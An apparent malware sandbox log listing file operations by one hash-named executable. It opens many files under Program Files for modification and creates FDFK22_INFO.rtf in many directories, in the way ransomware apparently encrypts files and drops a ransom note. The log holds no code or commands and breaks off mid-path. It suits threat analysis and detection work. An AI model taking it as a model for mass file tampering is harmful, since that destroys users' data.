a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\skins\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\Class.zip a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Port_Moresby a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-lib-profiler-ui_ja.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-threaddump.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.security_1.2.0.v20130424-1801.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\PDFSigQFormalRep.pdf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx.ja_5.5.0.165303.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\epl-v10.html a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\SetupMetrics\20200616092334.pma a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\pa\LC_MESSAGES\vlc.mo a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4_default_win7.css a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\PMP\DataMatrix.pmp a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.ja_5.5.0.165303.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Campo_Grande a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\keytool.exe a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.nl_ja_4.4.0.v20140623020002.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.apache.batik.util_1.7.0.v201011041433.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\VisualElements\SmallLogoCanary.png a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\jfxrt.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.docs.ja_5.5.0.165303.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-masterfs_zh_CN.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\es\LC_MESSAGES\vlc.mo a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jre7\lib\cmm\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\lua\meta\reader\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\HideRedo.mpg a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Monaco a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Pago_Pago a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Panama a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Kentucky\Monticello a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-explorer_zh_CN.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\plugins\plugins.dat a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Argentina\San_Juan a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\WriteMerge.mp4 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\uk.pak a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\North_Dakota\Beulah a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\DataSet.zip a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jre7\lib\zi\America\North_Dakota\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Africa\Lagos a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\orbd.exe a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\unpack200.exe a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\ext\updater.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-profiler_ja.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Galapagos a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.frameworkadmin.equinox.nl_ja_4.4.0.v20140623020002.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Indian\Christmas a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\Form.zip a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_super.gif a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Atlantic\Canary a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\locale\ky\LC_MESSAGES\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\toc.gif a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Antarctica\Syowa a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-options-api.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Samara a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\Welcome.html a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Baghdad a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rcp.application.zh_CN_5.5.0.165303.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-sendopts_zh_CN.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench.addons.swt.nl_ja_4.4.0.v20140623020002.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Mozilla Maintenance Service\updater.ini a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Madrid a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Argentina\Rio_Gallegos a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.extensionlocation.nl_zh_4.4.0.v20140623020002.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\com.jrockit.mc.rjmx.metadataprovider.exsd a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Extensions\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\locale\fur\LC_MESSAGES\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\META-INF\ECLIPSE_.SF a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\core\com-sun-tools-visualvm-modules-startup.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.garbagecollector_1.0.200.v20131115-1210.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Adak a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\locale\ps\LC_MESSAGES\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_joined.gif a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Antarctica\Palmer a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.views.nl_zh_4.4.0.v20140623020002.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Argentina\Ushuaia a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Brussels a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\Ceuta a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT-10 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-api_ja.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.greychart.ui.zh_CN_5.5.0.165303.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Nicosia a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\MET a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\locale\bn_IN\LC_MESSAGES\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\cmm\GRAY.pf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ach\LC_MESSAGES\vlc.mo a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\EScript.api a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-applemenu_zh_CN.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Novokuznetsk a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jre7\lib\zi\America\Indiana\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jre7\lib\zi\Pacific\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Malta a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\bin\setNetworkClientCP a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.touchpoint.natives.nl_zh_4.4.0.v20140623020002.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdate.exe a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\SPPlugins\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\St_Johns a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Recife a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\locale\org-openide-modules_ja.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Windows Mail\en-US\msoeres.dll.mui a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\chrome_200_percent.pak a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-api-visual_ja.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\feature.properties a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\WET a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\org-netbeans-modules-profiler-selector-api.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Atlantic\Cape_Verde a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Spelling.api a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Saipan a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Antarctica\DumontDUrville a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\cs\LC_MESSAGES\vlc.mo a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\Workflow.VisualBasic.Targets a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\VDK10.THD a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Port-au-Prince a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\ext\meta-index a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\zh_TW\LC_MESSAGES\vlc.mo a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Indian\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\javafx-mx.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\org-netbeans-modules-profiler-utilities.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ta\LC_MESSAGES\vlc.mo a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\images\cursors\win32_LinkDrop32x32.gif a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\as_IN\LC_MESSAGES\vlc.mo a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Argentina\Catamarca a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT+10 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\ENU\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Jamaica a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\locale\pt_BR\LC_MESSAGES\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\plugin.properties a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core-windows_ja.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-settings_zh_CN.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\bs\LC_MESSAGES\vlc.mo a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Chuuk a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Windows Mail\wabmig.exe a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\license.html a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-profiling_zh_CN.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\zh_CN\LC_MESSAGES\vlc.mo a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Creston a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\LoginForm.zip a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Caracas a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.text.nl_zh_4.4.0.v20140623020002.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program 